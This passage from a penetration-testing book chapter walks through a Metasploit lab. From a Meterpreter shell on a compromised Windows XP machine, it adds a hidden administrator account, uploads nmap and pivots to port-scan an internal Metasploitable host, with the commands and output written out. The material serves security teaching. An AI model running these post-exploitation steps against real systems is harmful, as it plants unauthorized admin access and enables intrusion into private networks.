258
Chapter 17
Process 2480 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
net user msf metasploit /add
net user msf metasploit /ADD
The command completed successfully.
C:\WINDOWS\system32>
net localgroup administrators msf /add
net localgroup administrators msf /add
The command completed successfully.
C:\WINDOWS\system32>
C:\WINDOWS\system32>
^Z
Background channel 6? [y/N] y
meterpreter >
upload nmap.exe
[*] uploading : nmap.exe -> nmap.exe
[*] uploaded : nmap.exe -> nmap.exe
meterpreter >
We now have our launching pad for additional attacks. With
nmap
installed
on the target, we are essentially sitting on the internal network. We can now
attempt to enumerate internally connected systems and further penetrate
the network.
Scanning the Metasploitable System
With our Meterpreter session granting us access to the internal network via
the
load auto_add_route
command, we can scan and exploit the inside hosts
using the compromised Windows XP target as the launching point. We’re
effectively connected to the internal network, so we should be able to reach
our Metasploitable system. Let’s begin with a basic port scan.
nmap.exe -sT -A -P0 172.16.32.162
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
|_ftp-bounce: no banner
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_html-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB